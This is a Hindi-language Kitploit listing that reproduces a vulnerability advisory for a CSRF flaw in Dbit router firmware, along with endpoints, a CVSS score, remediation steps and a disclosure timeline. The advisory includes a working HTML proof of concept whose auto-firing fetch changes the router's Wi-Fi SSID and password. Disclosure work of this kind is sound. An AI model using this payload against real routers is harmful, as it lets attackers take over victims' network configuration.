Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-36956 — CVE-2026-36956 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, Dbit राउटर फर्मवेयर में एक CSRF भेद्यता जो जाली अनुरोधों के माध्यम से अनधिकृत कॉन्फ़िगरेशन परिवर्तनों की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/kirubel-cve/cve-2026-36956
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubkirubel-cve/cve-2026-36956

CVE-2026-36956

CVE-2026-36956 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, Dbit राउटर फर्मवेयर में एक CSRF भेद्यता जो जाली अनुरोधों के माध्यम से अनधिकृत कॉन्फ़िगरेशन परिवर्तनों की अनुमति देती है।

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-36956: वेब प्रबंधन इंटरफ़ेस में क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)

CVE ID: CVE-2026-36956 दिनांक: 2026-04-29 खोजकर्ता: Kirubel Solomne विक्रेता: Shenzhen Dibit Network Equipment Co., Ltd. उत्पाद: Dbit Router फर्मवेयर संस्करण: V1.0.0 CWE: CWE-352 - क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)


विवरण

Dbit Router फर्मवेयर V1.0.0 प्रशासनिक API एंडपॉइंट्स पर एंटी-CSRF टोकन या सख्त Origin/Referer सत्यापन जैसे CSRF सुरक्षा तंत्र लागू नहीं करता है। एक हमलावर एक दुर्भावनापूर्ण वेबपेज तैयार कर सकता है जो कॉन्फ़िगरेशन एंडपॉइंट्स पर नकली HTTP अनुरोध भेजता है। यदि कोई प्रमाणित व्यवस्थापक दुर्भावनापूर्ण पेज पर जाता है, तो राउटर नकली अनुरोध को एक वैध प्रशासनिक क्रिया के रूप में संसाधित करता है।


CVSS स्कोर

CVSS v3.1 स्कोर: 8.8 (उच्च) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

मीट्रिकमान
अटैक वेक्टरनेटवर्क
अटैक जटिलतानिम्न
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता इंटरैक्शनआवश्यक
गोपनीयता प्रभावउच्च
अखंडता प्रभावउच्च
उपलब्धता प्रभावउच्च

प्रभावित एंडपॉइंट्स

एंडपॉइंटकार्य
/api/setWlanवायरलेस नेटवर्क कॉन्फ़िगरेशन (SSID, पासवर्ड)
/api/setWanWAN कॉन्फ़िगरेशन
/api/setSystemसिस्टम कॉन्फ़िगरेशन

प्रूफ ऑफ कॉन्सेप्ट

निम्नलिखित को poc.html के रूप में सहेजें और इसे तब खोलें जब कोई व्यवस्थापक राउटर में लॉग इन हो:

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<script>
  fetch('http://192.168.10.1/api/setWlan', {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      ssid: "Hacked_Network",
      password: "attacker123"
    })
  });
</script>
</body>
</html>

अपेक्षित व्यवहार: CSRF टोकन बेमेल के कारण अनुरोध को अस्वीकार कर दिया जाना चाहिए। वास्तविक व्यवहार: राउटर नकली अनुरोध को स्वीकार करता है और संसाधित करता है।


प्रभाव

  • WiFi SSID और पासवर्ड का अनधिकृत संशोधन
  • WAN/DNS कॉन्फ़िगरेशन परिवर्तन
  • वैध उपयोगकर्ताओं के लिए सेवा से वंचित करना
  • पूर्ण राउटर कॉन्फ़िगरेशन अधिग्रहण

उपचार

  • सभी स्थिति-परिवर्तन एंडपॉइंट्स पर एंटी-CSRF टोकन लागू करें
  • सख्त Origin और Referer हेडर सत्यापन लागू करें
  • सत्र कुकीज़ के लिए SameSite=Strict कुकी विशेषता का उपयोग करें

प्रकटीकरण समयरेखा

दिनांकघटना
2026-04-29भेद्यता की खोज की गई
2026-04-29MITRE को रिपोर्ट किया गया
2026-04-29CVE-2026-36956 निर्धारित किया गया
2026-04-29सार्वजनिक प्रकटीकरण

संदर्भ

  • MITRE CVE-2026-36956
  • CWE-352
  • विक्रेता वेबसाइट
टूल डाउनलोड करें